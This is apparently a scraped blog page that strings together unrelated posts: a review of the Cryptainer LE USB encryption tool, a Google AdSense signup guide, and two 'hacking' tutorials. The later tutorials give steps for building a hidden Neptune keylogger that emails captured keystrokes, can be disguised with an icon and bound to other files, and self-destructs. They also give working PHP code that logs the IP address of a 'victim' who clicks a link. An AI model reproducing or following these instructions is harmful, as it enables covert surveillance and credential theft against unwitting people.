floppies, people are able to put large quantities of personal data on these
removable drives. I've seen unprotected items ranging from QuickBooks files to
online passwords with lots in between.
There are different ways that you
can protect your data. Previously, we wrote about biometric USB drives which
offer a high degree of security for a high price. This time around, we thought
we would find a free utility that could password protect and encrypt our USB
drive. We found one called Cryptainer LE from Cypherix.
Cryptainer LE
Cryptainer LE is part of a suite of
security products offered by the company that works on Windows. The LE product
is their free version which offers some compelling features such as:
- Disk encryption for files and folders (Blowfish
algorithm)
- Creation of secure email attachments
- Virtual drive that appears in Windows Explorer
- Passwords from 8 to 100 characters
The other item that distinguishes
Cryptainer LE is that it has a component that can be loaded on to USB drives
called Cryptainer Mobile. This means you can carry your data on the
thumb drive without needing a program on the host computer to decrypt. The one
caveat is this doesn't work with Windows 98 and Windows ME since those
operating systems don't auto load USB drivers.
Encrypted Volumes
The program works by creating a
volume where you drag and drop the files and folders you wish to protect. Each
volume has its own password. You might think of the volume as a vault of a set
size you determine. The volumes have a .cry file extension and can be as large
as 25 MB in the free version. You can create as many volumes as needed.
If you view the files on your USB
drive in Windows Explorer, you see 3 types of items:
- CrpytainerMobileFiles folder: this folder contains the program files. The
contents are not encrypted. If you delete the folder your volumes still exist,
but you'll need to reinstall the software.
- Cryptainermobile.exe: this is the program you use to encrypt and decrypt
vaults on your USB drive.
- .cry files: these are your volumes and contain the files and folders
you've encrypted. You'll notice that you can't tell what's contained in the
vault.
If someone were to find your thumb
drive and open one of these volumes with the .cry extension, the data would be
meaningless. The screen shot below shows how one of my vaults looks in a
program editor. I can't figure it out and I wrote the article.
Decrypting the Volumes
To see and use the contents of a
volume, you need to load and decrypt it with Cryptainermobile.exe, using the
password you set for the volume. The process is fast, but varies with the size
of the file.
Once the volume is decrypted, you
can work with it as normal. You may also view it as a drive using Windows
Explorer. In the example below, I've loaded my vault1.cry as Drive: J. At this
stage, you can also see the assigned volume name (1) WEBSITE, which is more
meaningful than vault1.cry. On the right side are the two files. I can now work
with these files as normal until I unload the volume. For example, to add more
files to the volume, I can drag and drop them from my desktop into the volume.
Installing Cryptainer LE
To get the mobile version on your thumb
drive, you need to first install the Cryptainer LE program on your computer.
Even though I'm highlighting Cryptainer Mobile, it is part of the bigger
program. The benefit is that you can use the same protection on your computer
folders and files.
One item that people may skip during
the installation process is the program's end user license agreement. You would
be wise to give it a look as it has clear language that states you're out of
luck if you lose your password. The company can't retrieve your data and it
will stay encrypted until you remember it. Use caution when setting your
password(s) as you want one that protects your data, but not one people could
easily guess.
Creating a Volume
During the computer installation,
you'll be asked to create a volume. This is where you define the size and
provide a meaningful name. The first volume you create becomes the primary
volume which means it displays by default after you enter your password.
The dialog will preset certain values
such as file location and size, but you can easily change these. The
maximum volume size is 25 MB. This is a limitation of the free version, but you
can create multiple volumes on a drive. It's important to note that this space
is allocated immediately and not based on when you add files. If you don't plan
on using the desktop version, you might want to create a smaller volume. After
retyping your password, click Proceed to Create Volume.
Installing Cryptainer Mobile
With the desktop version installed,
you can add the mobile component. This is done by clicking the triangular icon
and opening Cryptainer LE. On the Tools menu, there is a menu item for Install
Cryptainer Mobile.
The mobile program files will be
copied to your USB drive. To start the mobile version, you need to close the
desktop version. The process for creating volumes on the USB drive is the same
as on the desktop.
The hardest part in this whole
process is deciding on the correct password to use. Although the mobile
installation is a two-step process, it won't take long. From there, it's a
simple matter of opening the program and dropping whatever files you wish to
protect in your vault. As long as you have the volume loaded, you can use your
data in a normal fashion. Once you pull the thumb drive out, the volume unloads
and the files can't be opened or viewed without the password.
One item to remember is if you use
the desktop version and drag and drop files, you're copying files to the new
volume. In other words, if I create a volume on my desktop which is assigned
Drive E: and I drop a folder from My Documents into that vault, I have two
copies on my computer. One is the original in My Documents and the other is the
copy I placed in the vault.
Initially, I thought the 25MB size
volume restriction would be an issue for me. Instead, I've found I prefer
having multiple volumes based on the nature of the data. You also have the
option of upgrading the program for a small fee which removes this restriction
and adds more standardized methods of encryption.
I would definitely give the program
a try if you have sensitive data on a removable USB drive. This program will
put your mind at ease and protect your data in the event the drive is lost or
stolen.
How To Start a Google AdSense Account and Make Money Blogging
Starting a new account with Google AdSense is one of the
easiest ways to start monetizing
your blog. While Google AdSense might not make you rich, it's a simple and
useful tool. In fact, it's usually the first step bloggers typically take to
earn an income from their blogs because it is so easy to get started.
Difficulty: Easy
Time Required: 10-15 minutes to open an account.
Additional time to research the options to monetize your blog.
Here's How:
1. Familiarize yourself with what you can and cannot
do as part of the Google AdSense program to ensure you're prepared to start
your new account.
2. Click on the 'Sign Up Now' button in the upper
right-hand corner of your screen.
3. Complete the online application.
You will need to provide your blog's URL
and primary language as well as answer some questions related to the rules of
the Google AdSense program. You'll also need to provide your payment
information to receive the money you generate on your blog from Google.
4. Access your new account and review the ads available to you.
Google AdSense provides a wide variety of
advertising options to bloggers from text ads to image ads and more. Take some
time to research everything that's available to determine what will work best
for your blog.
5. Select your ad design choices.
Once you've decided which ad opportunities are
best for your blog, select them. Google will provide a snippet of HTML
code to you after you make your selection.
6. Insert your Google AdSense HTML code into your blog.
Copy and paste the HTML code provided by Google
into your blog's template. One of the easiest ways for a beginner blogger to do
this is by inserting a text widget into his or her blog's template and pasting
the code in the widget.
7. Let Google do the rest.
It may take a few hours or a few days for Google
to start serving ads on your blog. Google will search your blog to determine
the predominant subjects of each page. When readers visit your blog, the HTML
code you pasted into your blog from Google will activate and relevant ads will
be displayed based on each page's content.
8. Collect your money.
Remember, Google AdSense typically pays based on
click-throughs (the number of times people click on an ad). Therefore, Google
AdSense is unlikely to generate a large income for you, but every bit helps!
Tips:
- Read and adhere to the Google AdSense policies in full before you sign up for
a Google AdSense account. If you violate any of the policies, your account
will be cancelled.
- Take some time to perfect your Google AdSense program once you get started by
learning the steps you need to take to increase your Google AdSense earning
potential.
Keylogger Attack ? (hacking)
What Is a Keylogger?
Using a keylogger utility you will be able to establish full
control over your computer. You will also find out what was going on on your
computer in your absence: what was run, what was typed, etc., so it can act as
the best children's internet protection software. Using the keylogging program
constantly, you can restore previously typed text in case you have lost it.
Keystroke logger software works in hidden mode and is invisible on Windows
operating systems, including Windows 7/VISTA/XP/Server 2008/NT/98 etc.
Let's start the guide: how to use it?
1) First you need to download this application. You can download it from its website Download, but currently it's under maintenance..
Download here - Click Here To Download
2) I am giving the tutorial for Neptune 1.4 only, but you can use 1.45 also; it is an updated version that sends screenshots as well.
After downloading, extract the .rar file, open the project's folder and click on project Neptune v1.4. It will show a window like the one shown below; do whatever is mentioned in the screenshot.
Note: I am giving the tutorial for getting logs by mail (Gmail here), but you can use another provider, or use an FTP server instead.
3) Now go to the 'Server Creation' tab
and press 'Generate new server' under 'server creation', give a name to your
keylogger and that's it.. you are done :)
4) Make it self-destructive: In the Extra options tab, you can check 'self destruct on ' if you want it to be removed after a particular date.
5) Add Icon: You can also add any icon to the final keylogger file. For that, go to the 'Server Creation' tab, select 'Use file icon' under 'server settings' and select any icon file.
6) Binding: You can bind it with any other file also. For that, press the file binder button; a window will open (as shown in the screenshot). Then right-click, select 'add file' and select anything, e.g. any software, movie, video, song etc., with which you want to bind it. 5.1) After selecting the binding file, don't close this window, and go to step 3.
7) Screenshots: (only available in Neptune 1.45) Go to Extra options and check 'send screen shots' under 'Screenshots'
How To Grab Someone's IP Address?
I will show you how to grab someone's IP address using a PHP script. This method can be used to grab someone's IP address on Yahoo or Facebook chat or by sending mail to the victim. So let's get started.
Copy the code below into Notepad and save it as Grab.php (the .php extension is a must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
Now make a free account on any of the free web hosting sites, such as Ripway or My3gb.
Now upload Grab.php to your web hosting site.
Copy the link of your uploaded file and send it to the victim.
As soon as the victim clicks on your link, his IP will be saved on your free web hosting site.
Enjoy, you are done!!